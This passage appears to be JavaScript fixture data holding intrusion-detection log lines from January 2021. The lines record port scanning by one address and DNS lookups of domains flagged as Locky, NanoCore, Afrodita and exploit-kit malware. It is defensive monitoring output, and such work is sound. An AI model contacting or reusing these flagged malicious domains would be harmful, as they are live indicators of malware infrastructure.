    '"2021-01-11 02:58:06.000149" r2d2 91.123.157.56 54405,54408,54412,54423,54425,54432,54439,54445,54450,54452,54456,54458,54461,54476,54485,54517,54571,54662,54665,54666,54675,54677,54681,54686,54693,55147,55150,55156,55160,55175,55179,55182,55202,55208,55211,55214,55220,55223,55227,55230,55238,55241,55247,55250,55664,55666,55667,55671,55674,55690,55700,55704,55708,55712,55718,55719,55720,55732,55787,55791,55794,55797,55800,55806,55809,55812,55815,55821,55824 2.200.108.161,2.200.108.165,2.200.108.206,2.200.108.247,2.200.109.178,2.200.109.228 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:06.000110" r2d2 91.123.157.56 9231,9854,9895,10472,10671,10709,10715,10722,10727,10737,10792,18237,18247,18256,18268,18274,18297,18474,18478,18494,18621,22916,23012,24364,32874,32875,41344,41351,41360,41367,41853,42187,42199,46192,46193,46196,46197,46206,48516,53507,53513,53515,53518,53521,53525,53532,53538,53544,53547,53553,53973,53978,53982,53986,53991,53993,53995,54006,54012,54015,54031,54392,54399,54402,54403,54406,54419,54422,54424,54434,54436,54443,54448,54456,54458,54461,54482,54485,54517,54571,54662,54665,54666,54672,54677,54701,54707,54726,54742,54756,54760,54764,54768,54791,54794,54798,55722,55723,55724,55725,55726,55727,55728,55733,55735,55737,55741,55833,55836,55839,55842,55845,55853,55859,55862,55868,55872,55875,55939,55941,55943,55947,55953,55955,55957,55959,55961,55966,55968,55996,55999,56002,56006,56009,56012,56018,56024,56030,56033,56039,56042,56045,56048,56052,56054,56055,56057,56061,56064,56065,56068,56071,56072,56074,56075,56077,56078,56080,56081,56083,56084,56087,56088,56089,56091,56092,56093,56094,56096,56097,56099,56100,56101,56102,56114,56117,56120,56127,56132,56138,56140,56143,56145,56146,56148,56151,56153,56154,56156,56158,56160,56161,56164,56167,56172,56175,56375,56378,56381,56405,56418,56421,56424,56430,56433,56436,56439,56442,56445,56505,56508,56514,56520,56523,56526,56534,56538,56542,56545,56551,56554,56557,56567,56569,56571,56572,56575,56577,56579,56581,56583,56585,56596,56604,56607,56610,56614,56620,56623,56632,56635,56638,56641,56927,56931,56934,56947,56950,56953,56956,56959,56965,56967,57449,57452,57456,57460,57464,57485,57488,57492,57493,57494,57495,57682,57685,57688,57690,57695,57698,57700,57702,57704,57706,57710,57712,57714,57765,57767,57768,57770,57772,57778,57781,57787,57790,57793,57796,57920,57924,57927,57933,57936,57973,57975,57983,57992,57996,58001,58004,58005,58009,58011,58012,58014,58015,58016,58019,58021,58023,58307,58311,58313,58317,58319,58414,58418,58425,58429,58431,58444,58448,58724,58730,58733,60031,60034 2.200.108.117,2.200.108.118,2.200.108.129,2.200.108.133,2.200.108.142,2.200.108.147,2.200.108.148,2.200.108.149,2.200.108.155,2.200.108.165,2.200.108.180,2.200.108.204,2.200.108.209,2.200.108.215,2.200.108.224,2.200.108.229,2.200.108.236,2.200.108.237,2.200.108.240,2.200.108.248,2.200.108.255,2.200.108.79,2.200.109.115,2.200.109.175,2.200.109.177,2.200.109.245,2.200.109.41,2.200.109.69,2.200.109.94 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:06.000106" r2d2 91.123.157.56 3591,3593,3594,3596,3597,3599,3600,3601,3603,3604,3605,4333,4335,4336,4337,4341,4342,4343,4344,4346,4347,4350,4470,4471,4473,4474,4475,4480,4481,4482,4483,4485,4677,5399,5402,5407,5408,5409,5410,5413,5414,5415,5793,5861,9133,9231,9465,9526,9559,9725,9811,9842,9854,10406,10410,10427,10430,10436,10447,10472,10671,10672,10691,10709,10713,10715,10722,10727,10731,10735,10739,10743,18235,19517,22904,24351,24718,25116,28956,32875,34475,41342,41349,41369,42191,42195,42201,46192,46194,46196,46200,46206,48210,48510,48516,53607,53609,53613,53616,53618,53651,53654,53663,53666,53671,53674,54349,54353,54357,54360,54370,54373,54376,54380,54386,54390,54391,54392,54396,54399,54402,54403,54406,54411,54415,54419,54424,54430,54434,54436,54443,54448,54452,54456,54458,54461,54482,54485,54517,54571,54662,54665,54666,54677,54684,54691,54696,54703,54716,54723,54730,54738,54747,55061,55064,55188,55191,55242,55245,55249,55252,55255,55258,55276,55279,55284,55287,55306,55647,55649,55653,55655,55657,55659,55661,55663,55668,55672,55676,55721,55722,55723,55724,55725,55726,55727,55728,55730,55731,55733,55735,55737,55739,55783,55794,55797,55800,55803,55809,55815,55818,55821,55824,55827,55928,55969,55972,55975,55977,55980,55982,55985,55988,55991,55994,55997,56000,56004,56052,56055,56059,56064,56068,56077,56080,56083,56085,56087,56088,56089,56091,56092,56093,56094,56095,56096,56097,56098,56099,56100,56101,56102,56103,56104,56106,56107,56108,56109,56111,56116,56119,56125,56131,56134,56137,56139,56147,56150,56152,56155,56159,56162,56165,56286,56296,56306,56312,56315,56327,56331,56335,56337,56339,56341,56357,56361,56366,56372,56375,56378,56381,56384,56391,56405,56418,56421,56424,56427,56430,56433,56436,56439,56442,56554,56564,56567,56569,56571,56572,56577,56581,56583,56585,56588,56591,56600,56603,56606,56609,56612,56615,56618,56624,56627,56630,56633,56685,56688,56691,56695,56698,56702,56705,56708,56712,56715,56721,56725,56730,56733,56738,56741,56744,56750,56754,56760,56763,56766,56769,56773,57549,57553,57555,57560,57563,57566,57569,57572,57574,57577,57580,57583,57717,57720,57723,57730,57738,57741,57745,57747,57749,57752,57758,57763,57765,57767,57768,57770,57772,57774,57776,57778,57781,57787,57790,57796,57942,57944,57946,57947,57951,57953,57957,57959,57961,57963,57965,57969,58025,58027,58033,58035,58037,58039,58044,58045,58047,58049,58053,58055,58057,58059,58065,58067,58069,58101,58103,58107,58109,58110,58156,58158,58160,58164,58166,58168,58170,58173,58178,58182,58184,58187,58191,58424,58433,58435,58440,58442,58447,58457,58460,58462,58494,58500,58580,58724,58727,58730,58733,60031,60034,62189,62193,62196,62202,62204,62206,62208,62210,62212,62214,62216,62659,62662,62665,62671,62674,62677,62683,62686,62689,62691,62700,62781,62784,62785,62787,62788,62789,62792,62793,62794,62795,62797,62798,62799,62802,62803,62804,62805,62806,62807,62809,62811,62812,62814,62816,62856,62857,62863,62864,62869,62872,62873,62876,62882,62885,62887,62977,62979,62981,62982,62984,62986,62988,62990,62994,62995,62997,62999,63116,63119,63120,63123,63126,63130,63132,63133,63135,63138,63139,63141,63142,63650,63806,63809,63812,63815,63821,63827,63830,63833,63844,63893,63896,63898,63900,63903,63904,63905,63907,63912,63914,63918,63920,63922,63945,63948,63950,63951,63953,63955,63958,63959,63962,63963,63964,63966,63968,63969,63972,64055,64090,64094,64096,64098,64100,64102,64106,64108,64110,64112,64116,64198,64200,64202,64204,64441,64444,64450,64453,64456,64459,64465,64471,64474,64477,64483,64486,64492,64673,64675,64688,64691,64694,64697,64700,64703,64709,64712,64714 2.200.107.26,2.200.107.78,2.200.108.103,2.200.108.121,2.200.108.129,2.200.108.145,2.200.108.146,2.200.108.147,2.200.108.152,2.200.108.155,2.200.108.159,2.200.108.163,2.200.108.165,2.200.108.168,2.200.108.172,2.200.108.173,2.200.108.174,2.200.108.176,2.200.108.180,2.200.108.182,2.200.108.184,2.200.108.186,2.200.108.192,2.200.108.193,2.200.108.195,2.200.108.199,2.200.108.200,2.200.108.205,2.200.108.206,2.200.108.209,2.200.108.214,2.200.108.224,2.200.108.227,2.200.108.231,2.200.108.233,2.200.108.235,2.200.108.237,2.200.108.240,2.200.108.241,2.200.108.245,2.200.108.250,2.200.108.253,2.200.108.255,2.200.109.162,2.200.109.163,2.200.109.181,2.200.109.235,2.200.109.61,2.200.109.71,2.200.109.88,2.200.109.9 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:15.674152" r2d2 2.200.110.232 63565 2.200.107.169 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:58:07.000554" r2d2 91.123.157.56 1141,1142,1147,1148,1149,1151,1152,1153,1154,1156,1157,1314,1319,1320,1322,1324,1325,1326,1327,1329,1330,1331,1333,3285,3287,3291,3293,3294,3295,3299,3301,3303,3306,3308,3593,3594,3596,3599,3600,3601,3602,3603,3604,3605,3607,4852,4854,4859,4860,4861,4863,4864,4865,4868,4872,4878,5253,6996,6997,6998,6999,7000,7001,7002,7004,7005,7008,7009,7109,9133,9231,9526,9559,9617,9725,9790,9811,9842,9854,9895,10472,10671,10709,10715,10722,10727,10733,10737,19517,19926,22904,22916,23012,24351,24364,24718,24752,25116,25624,32874,32875,41344,41349,41351,41360,41367,41853,42187,42190,42194,42199,46193,46196,46197,46206,48510,48516,53812,53815,53818,53825,53827,53831,53836,53840,53852,53857,53860,55721,55722,55723,55724,55725,55726,55727,55728,55730,55731,55733,55735,55737,55739,55741,55996,56002,56006,56009,56012,56018,56021,56024,56030,56036,56039,56089,56091,56092,56093,56096,56097,56098,56099,56100,56101,56102,56104,56106,56107,56108,56110,56111,56113,56116,56119,56131,56134,56137,56286,56306,56312,56318,56321,56324,56327,56331,56335,56337,56339,56349,56353,56355,56360,56363,56367,56370,56376,56378,56380,56381,56384,56390,56391,56398,56405,56418,56421,56424,56427,56430,56433,56436,56439,56470,56473,56476,56479,56482,56485,56487,56490,56491,56494,56495,56496,56497,56499,56502,56554,56557,56561,56564,56567,56569,56571,56572,56575,56577,56579,56583,56585,56596,56601,56604,56610,56620,56623,56626,56629,56632,56635,56638,56831,56834,56837,56843,56846,56849,56853,56857,56863,56866,56869,57011,57018,57020,57022,57023,57025,57027,57029,57031,57033,57040,57043,57172,57175,57176,57180,57305,57356,57366,57373,57378,57386,57390,57392,57396,57402,57412,57415,57418,57421,57424,57427,57428,57430,57434,57435,57438,57443,57445,57451,57496,57499,57503,57507,57510,57525,57530,57538,57592,57595,57597,57602,57604,57606,57611,57612,57614,57615,57617,57619,57621,57623,57627,57629,57633,57636,57639,57678,57682,57685,57692,57698,57702,57704,57706,57708,57710,57712,57714,57725,57729,57732,57736,57740,57743,57746,57748,57755,57757,57759,57868,57871,57878,57881,57884,57887,57890,57896,57900,57903,57906,57909,57913,57922,57926,57942,57944,57946,57947,57951,57955,57959,57961,57963,57965,57967,57969,58003,58010,58048,58050,58052,58054,58056,58058,58060,58062,58192,58195,58198,58209,58253,58255,58257,58259,58261,58296,58299,58506,58512,58518,58525,58531,58537,58697,58701,58705,58709,58711,58712,58719,58720,58723,58724,58725,58727,58728,58730,58731,58733,58734,58737,58744,58746,58750,60031,60034,60037,60806,60825,60829,60851,60863,60912,60915,60934,60977,61133,61181,61183,61188,61191,61193,61198,61201,61204,61206,61208,61213,61231,61298,61341,61486,61530,61538,61549,61565,61594,61631,61680,61695,61698,61751,61778,61796,61803,61814,61819,61835,61838,61841,61859,61902,61906,61909,61916,61922,61925,61928,61929,61931,61934,61937,61940,61979,62028,62034,62046,62097,62176,62243,62270,62364,62372,62420,62482,62484,62486,62487,62489,62492,62493,62497,62498,62499,62501,62574,62597,62598,62599,62601,62602,62604,62607,62616,62619,62623,62629,62660,62688,62692,62695,62698,62701,62711,62716,62723,62725,62731,62736,62740,62741,62747,62753,62756,62760,62763,62764,62765,62768,62771,62772,62779,62782,62796,62859,62878,62917,62946,62975,62977,62979,62980,62981,62982,62986,62988,62993,62994,62995,62997,62999,63036,63059,63060,63061,63066,63069,63070,63071,63072,63073,63076,63077,63078,63079,63080,63083,63085,63086,63087,63088,63089,63090,63093,63094,63095,63116,63119,63120,63122,63123,63126,63130,63133,63138,63139,63142,63143,63144,63145,63147,63150,63153,63156,63159,63166,63167,63168,63169,63170,63650,63803,63806,63809,63815,63818,63821,63827,63830,63833,63893,63896,63898,63900,63903,63904,63905,63906,63907,63908,63909,63910,63911,63912,63913,63914,63916,63917,63918,63919,63920,63921,63923,63925,63931,64120,64124,64126,64128,64132,64134,64136,64138,64142,64144,64146,64450,64459,64465,64471,64474,64477,64480,64481,64483,64484,64486,64487,64489,64490,64492,64493,64495,64496,64499,64501,64502,64504,64505,64578,64582,64585,64588,64594,64600,64603,64607,64668,64671,64673,64675,64682,64685,64688,64691,64697,64700,64703,64709,64712 2.200.106.178,2.200.106.186,2.200.106.194,2.200.106.34,2.200.106.67,2.200.106.69,2.200.106.82,2.200.107.145,2.200.107.227,2.200.107.30,2.200.107.78,2.200.108.129,2.200.108.133,2.200.108.135,2.200.108.144,2.200.108.145,2.200.108.147,2.200.108.149,2.200.108.154,2.200.108.155,2.200.108.166,2.200.108.167,2.200.108.171,2.200.108.173,2.200.108.174,2.200.108.175,2.200.108.181,2.200.108.183,2.200.108.194,2.200.108.195,2.200.108.205,2.200.108.209,2.200.108.214,2.200.108.223,2.200.108.224,2.200.108.226,2.200.108.231,2.200.108.233,2.200.108.235,2.200.108.237,2.200.108.242,2.200.108.244,2.200.108.252,2.200.108.254,2.200.108.33,2.200.108.50,2.200.108.79,2.200.108.89,2.200.109.123,2.200.109.127,2.200.109.135,2.200.109.142,2.200.109.145,2.200.109.153,2.200.109.163,2.200.109.169,2.200.109.31,2.200.109.35,2.200.109.53,2.200.109.69 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:17.585157" r2d2 2.200.110.232 63490 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:58:17.611741" r2d2 2.200.110.233 64087 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:58:17.619071" r2d2 2.200.110.233 64532 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:58:17.686646" r2d2 2.200.110.233 64252 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:58:09.000078" r2d2 91.123.157.56 1141,1142,1143,1146,1148,1149,1151,1152,1153,1156,1157,1891,2810,3010,3011,3012,3013,3014,3017,3020,3021,3022,3023,3024,3025,3120,3350,3351,3352,3354,3356,3357,3359,3360,3361,3547,3696,3760,3762,3763,3766,3767,3768,3770,3772,3773,3774,3775,3776,4272,4333,4335,4336,4337,4339,4340,4341,4344,4345,4346,4347,4348,4350,4454,4455,4456,4457,4458,4460,4462,4463,4465,4466,4469,4470,4471,4474,4475,4476,4479,4480,4481,4485,4536,4677,4939,5117,6379,6381,6382,6383,6384,6385,6387,6388,6389,6390,6391,6392,6393,9133,9231,9465,9526,9559,9617,9725,9842,9854,9895,10671,10709,10715,10722,10733,10737,22904,22993,24351,24718,29116,32874,32875,41342,41349,46192,46196,46206,48510,48516,55770,55773,55776,55779,55782,55790,55793,55799,55802,55805,55808,55811,55851,55854,55857,55860,55863,55866,55869,55873,55876,55880,55889,55902,55907,55939,55941,55943,55945,55947,55951,55953,55957,55959,55963,55966,55996,55999,56002,56009,56012,56015,56018,56027,56030,56033,56039,56089,56091,56093,56094,56095,56096,56097,56099,56100,56101,56102,56106,56107,56108,56109,56110,56111,56113,56116,56119,56125,56129,56131,56134,56137,56140,56141,56143,56146,56147,56150,56152,56153,56156,56158,56159,56161,56162,56164,56165,56167,56168,56172,56175,56176,56314,56320,56323,56326,56329,56332,56334,56357,56366,56369,56372,56445,56459,56461,56463,56467,56468,56469,56470,56471,56473,56475,56476,56477,56478,56479,56480,56481,56482,56484,56485,56486,56489,56491,56492,56494,56495,56496,56497,56499,56502,56554,56557,56559,56561,56565,56567,56569,56571,56572,56575,56577,56579,56581,56583,56585,56599,56636,56639,56642,56644,56645,56646,56649,56650,56652,56653,56654,56655,56656,56657,56658,56659,56660,56661,56662,56663,56664,56668,56669,56670,56672,56675,56676,56677,56678,56679,56681,56683,56684,56686,56689,56835,56838,56842,56847,56850,56854,56858,56861,56864,56927,56931,56934,56941,56947,56950,56953,56956,56959,56962,56965,56967,57549,57551,57558,57560,57563,57566,57569,57572,57574,57577,57583,57765,57767,57768,57772,57774,57776,57778,57781,57784,57787,57790,57796,57920,57924,57927,57933,57936,58005,58008,58015,58019,58021,58023,58044,58047,58049,58053,58055,58057,58059,58061,58063,58067,58069,58156,58158,58160,58162,58164,58166,58168,58170,58173,58175,58178,58182,58184,58187,58307,58311,58315,58317,58410,58414,58422,58424,58425,58428,58429,58431,58433,58435,58437,58440,58442,58447,58448,58457,58462,58494,58724,58730,58733,58745,58749,58754,58757,59937,60031,60034,61181,61183,61186,61188,61191,61196,61198,61202,61204,61206,61208,62042,62139,62187,62189,62196,62198,62200,62202,62204,62208,62210,62212,62214,62216,62259,62327,62463,62500,62540,62545,62574,62580,62632,62662,62665,62668,62671,62674,62677,62680,62686,62689,62691,62694,62697,62700,62714,62783,62785,62787,62788,62791,62793,62795,62796,62797,62799,62803,62805,62807,62810,62813,62817,62820,62823,62826,62829,62831,62833,62835,62837,62839,62841,62843,62846,62849,62852,62855,62858,62859,62865,62868,62871,62874,62877,62878,62880,62883,62884,62886,62904,62905,62906,62908,62910,62911,62912,62913,62914,62915,62917,62919,62920,62921,62923,62946,62977,62979,62980,62981,62988,62990,62993,62994,62995,62996,62997,62999,63008,63036,63040,63041,63042,63045,63046,63048,63051,63053,63054,63055,63056,63057,63058,63063,63078,63080,63083,63085,63086,63087,63089,63091,63092,63094,63095,63096,63097,63099,63100,63101,63103,63104,63105,63108,63111,63114,63116,63120,63122,63126,63130,63132,63133,63135,63138,63139,63142,63144,63145,63147,63149,63150,63156,63159,63162,63163,63164,63167,63168,63169,63170,63254,63398,63400,63401,63405,63406,63407,63409,63410,63411,63413,63600,63606,63609,63616,63620,63623,63631,63635,63638,63641,63647,63714,63720,63723,63725,63726,63729,63732,63738,63740,63743,63744,63747,63806,63809,63815,63818,63821,63824,63830,63833,63898,63901,63903,63904,63945,63948,63951,63953,63955,63957,63960,63961,63964,63966,63972,64026,64029,64034,64040,64043,64046,64048,64051,64084,64086,64088,64090,64092,64096,64098,64100,64102,64108,64110,64112,64114,64116,64450,64453,64459,64462,64465,64468,64474,64477,64480,64483,64486,64492,64495,64498,64501,64504,64507,64578,64582,64585,64588,64591,64594,64597,64600,64603,64607,64673,64678,64682,64691,64694,64697,64700,64703,64709,64712,64714,64733,64740,64742,64743,64744,64745,64750,64752,64754,64756,64762,65085,65086,65087,65089,65091,65092,65093,65094,65095,65096,65098 2.200.106.178,2.200.106.249,2.200.106.42,2.200.106.72,2.200.106.89,2.200.107.147,2.200.107.250,2.200.107.50,2.200.108.103,2.200.108.118,2.200.108.132,2.200.108.142,2.200.108.145,2.200.108.146,2.200.108.147,2.200.108.149,2.200.108.154,2.200.108.155,2.200.108.156,2.200.108.159,2.200.108.171,2.200.108.173,2.200.108.174,2.200.108.179,2.200.108.182,2.200.108.184,2.200.108.185,2.200.108.186,2.200.108.187,2.200.108.192,2.200.108.193,2.200.108.195,2.200.108.203,2.200.108.207,2.200.108.209,2.200.108.214,2.200.108.221,2.200.108.224,2.200.108.226,2.200.108.228,2.200.108.230,2.200.108.231,2.200.108.232,2.200.108.233,2.200.108.236,2.200.108.240,2.200.108.241,2.200.108.242,2.200.108.244,2.200.108.248,2.200.108.253,2.200.109.112,2.200.109.115,2.200.109.119,2.200.109.139,2.200.109.183,2.200.109.201,2.200.109.209,2.200.109.35,2.200.109.79,2.200.109.81,2.200.109.88,2.200.109.9 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:20.524931" r2d2 2.200.110.232 63376 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:58:20.526669" r2d2 2.200.107.146 24032 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:58:20.553405" r2d2 2.200.110.233 49186 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:58:12.000040" r2d2 91.123.157.56 3190,3191,3194,3198,3200,3201,3204,3207,3209,3210,3212,3213,3891,3892,3893,3894,3895,3898,3899,3903,3904,3905,3969,9133,9231,10709,18235,32874,32875,41853,46192,46196,46206,48516,55611,55615,55617,55622,55624,55627,55632,55807,55813,55816,55822,55828,55831,55834,55837,55840,55843,55847,55913,55917,55919,55923,55925,55927,55929,55930,55931,55933,55935,55937,55996,55999,56002,56006,56009,56012,56018,56024,56027,56030,56033,56042,56045,56048,56051,56054,56057,56062,56065,56072,56078,56081,56084,56112,56115,56118,56121,56419,56422,56425,56431,56434,56437,56440,56445,56446,56587,56590,56591,56593,56600,56603,56606,56609,56612,56618,56624,56627,56630,56633,56682,56685,56691,56695,56698,56702,56705,56715,56718,56721,56730,56927,56931,56937,56941,56944,56947,56950,56959,56962,56965,56967,57942,57944,57946,57951,57953,57957,57959,57961,57963,57965,57969,58307,58311,58313,58410,58414,58418,58422,58429,58431,58444,58448,60031,60034,60037,61041,61043,61046,61048,61049,61051,61053,61062,61064,61066,61068,61751,61769,61799,61803,61841,61979,62028,62034,62046,62243,62270,62662,62668,62671,62674,62677,62680,62683,62689,62691,62694,62700,62818,62822,62824,62827,62828,62832,62834,62838,62844,62847,62851,62853,62854,62977,62981,62982,62984,62985,62986,62988,62990,62993,62994,62995,62996,62997,62999,63078,63080,63083,63085,63086,63087,63088,63089,63090,63092,63095,63116,63120,63123,63130,63132,63133,63135,63138,63139,63141,63142,63147,63149,63150,63153,63154,63156,63166,63167,63168,63169,63170,63171,63173,63175,63177,63179,63182,63183,63185,63186,63277,63280,63282,63285,63287,63290,63295,63298,63301,63311,63350,63453,63456,63460,63462,63467,63468,63470,63471,63473,63474,63480,63483,63485,63563,63568,63572,63574,63575,63577,63578,63580,63585,63588,63612,63659,63881,63987,64007,64182,64256,64288,64301,64394,64439,64450,64453,64456,64459,64462,64465,64468,64471,64474,64477,64483,64486,64489,64492,64495,64498,64501,64504,64578,64582,64585,64588,64591,64594,64597,64600,64603,64607,64698,64791 2.200.106.71,2.200.106.82,2.200.107.186,2.200.108.118,2.200.108.134,2.200.108.139,2.200.108.146,2.200.108.148,2.200.108.149,2.200.108.152,2.200.108.160,2.200.108.170,2.200.108.171,2.200.108.174,2.200.108.200,2.200.108.214,2.200.108.224,2.200.108.226,2.200.108.233,2.200.108.235,2.200.108.236,2.200.108.244,2.200.108.251,2.200.109.117,2.200.109.128,2.200.109.186,2.200.109.47,2.200.109.87,2.200.109.98 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:21.409546" r2d2 2.200.107.146 56111 198.51.44.70 53 UDP DNS tbapi.search.ask.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:58:21.373580" r2d2 2.200.110.233 56233 2.200.107.168 53 UDP DNS tbapi.search.ask.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:58:21.431806" r2d2 2.200.107.146 53375 216.239.34.109 53 UDP DNS tbapi.search.ask.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:58:18.000068" r2d2 91.123.157.56 3760,3762,3765,3766,3767,3768,3770,3771,3773,3774,3775,3776,5382,5383,5385,5386,5389,5390,5391,5393,5394,5395,5398,5399,5400,5402,5404,5405,5407,5410,5413,5414,5415,5766,5793,6425,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,29115,61763,61765,61766,61768,61772,61774,61777,61781,61786,61790,61794,62447,62448,62451,62452,62453,62454,62455,62456,62459,62460,62462,62639,62645,62651,62654,62657,62659,62662,62663,62665,62669,62671,62672,62674,62676,62677,62679,62682,62686,62689,62694,62697,62700,62810,62813,62817,62820,62823,62826,62829,62831,62833,62839,62841,62977,62979,62981,62982,62985,62986,62988,62993,62994,62995,62996,62997,62999,63116,63120,63123,63126,63132,63133,63135,63138,63139,63141,63142,63144,63145,63147,63149,63150,63153,63156,63159,63164,63167,63168,63170,63213,63244,63280,63282,63285,63287,63292,63295,63298,63301,63304,63327,63372,63386,63396,63453,63456,63639,63653,63658,63659,63676,63731,63803,63806,63809,63812,63815,63818,63821,63825,63827,63830,63833,63898,63901,63904,64450,64453,64459,64462,64465,64471,64474,64477,64483,64486,64492 2.200.107.107,2.200.107.147,2.200.107.24,2.200.107.26,2.200.108.139,2.200.108.146,2.200.108.157,2.200.108.164,2.200.108.174,2.200.108.195,2.200.108.214,2.200.108.232,2.200.108.233,2.200.108.244,2.200.108.58,2.200.108.63 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:19.000300" r2d2 91.123.157.56 2937,2938,2939,2940,2942,2944,2948,2950,2952,2953,2955,4420,4421,4422,4423,4424,4425,4427,4428,4430,4432,4434,4470,4471,4474,4475,4476,4479,4480,4481,4483,4485,4677,4756,4760,4762,4763,4764,4765,4767,4768,4772,5195,5381,5420,5421,5422,5423,5424,5425,5426,5427,5428,5431,5433 2.200.106.177,2.200.107.255,2.200.107.27,2.200.108.130,2.200.108.182 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:58:43.381098" r2d2 2.200.110.232 65278 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:58:45.676932" r2d2 2.200.107.169 53 2.200.110.232 64207 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:58:45.676940" r2d2 2.200.107.169 53 2.200.110.232 64207 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:59:04.041605" r2d2 2.200.110.232 63726 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:59:06.129785" r2d2 10.1.19.42 59499 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:59:20.000061" r2d2 91.123.157.56 13711,13719,13723,13726,13730,13740,13754,13759,13769,13774,13785,13790,16448,16468,16470,16474,16504,16522,16590,16603,16620,16623,16656,19045,20018,21438,22126,22157,22297,22367,22389,22686,23125,23129,23231,23245,23246,23273,23396,23645,25439,25501,25510,25515,25579,25596,25650,25651,25683,25714,25754,25766,25822,25850,25863,25905,25933,25941,25984,25991,26018,26052,26060,26071,26146,26159,26213,26220,26333,26337,26355,26359,26368,26384,26402,26455,26466,26473,26485,26543,26549,26739,26742,26748,26757,26758,26761,26762,26766,26767,26770,26773,26785,26789,28339,28426,28432,28434,28487,29163,29236,29503,29536,30239,30242,30465 2.200.110.128,2.200.110.167,2.200.110.168,2.200.110.171,2.200.110.174,2.200.110.182,2.200.110.218,2.200.110.226,2.200.110.254 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:59:25.171737" r2d2 2.200.110.232 64010 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:59:20.000069" r2d2 91.123.157.56 4800,4967,4995,4997,5001,5003,5018,5021,5028,5031,5044,5053,5056,13619,13622,13625,13629,13645,13651,13654,13658,13662,13675,13703,13801,13805,13815,13820,13825,13829,13834,13841,13845,16403,16423,16424,16440,16445,17493,19093,22023,22076,22111,22127,22208,22241,22284,22298,22346,22377,22436,23108,23145,23540,23590,23601,23678,25498,25500,25504,25505,25506,25507,25509,25514,25600,25604,25612,25637,25660,25697,25698,25700,25701,25702,25703,25705,25708,25709,25710,25711,25816,25854,25912,25995,26064,26102,26103,26105,26106,26107,26108,26109,26110,26111,26113,26114,26116,26117,26119,26120,26123,26125,26127,26128,26130,26131,26136,26137,26138,26196,26197,26198,26200,26201,26202,26203,26204,26205,26206,26207,26208,26209,26210,26251,26252,26253,26281,26283,26293,26296,26300,26308,26315,26321,26325,26329,26908,26913,26914,26915,26919,26920,26939,26944,26949,26952,26955,27382,28339,28432,28487,29031,29163,29236,29364,29503,30239,30241,30242,33506,36974,37526,37567,38108,39312,39313,39314,39315,39317,39319,39321,39322,39323,39325,39327,39393,39395,39397,39398,39399,39403,39405,39411,39415,39418,39424,39428,39431,39435,39437,39439,39440,39443,39444,39446,39447,39449,39454,39455,39458,39463,39486,39489,39491,39492,39494,39495,39496,39497,39499,39500,39501,39504,39505,39506,39507,39508,39509,39510,39511,39513,39515,39516,39517,39519,39571,39580,39812,39816,39822,39826,39829,39838,39844,39850,39856,39867,39877,39883,39890,40584,40585,40589,40591,40594,40595,40597,40598,40600,40603,40604,40607,40731,40735,40737,40740,40741,40746,40749,40752,40754,40757,40759,40768,40769,40775,40776,40777,40778,40779,40788,40819,40830,40832,40833,40835,40836,40838,40839,40840,40841,40843,40847,40848,40849,40850,40852,40854,40855,40862,40867,40878,40891,40958,40960,40961,40962,40963,40964,40965,40968,40971,40973,40974,40977,40979,40983,40990,41002,41006,41026,41033,41037,41041,41083,41087,41092,41097,41102,41108,41113,41118,41134,41138,41143,41148,41153,41170,41171,41196,41256,41258,41265,41276,41287,41292,41295,41298,41302,41306,41310,41319,41325,41331,41338,41393,41398,41401,41404,41406,41409,41414,41415,41417,41419,41436,41438,41442,41445,41447,41449,41452,41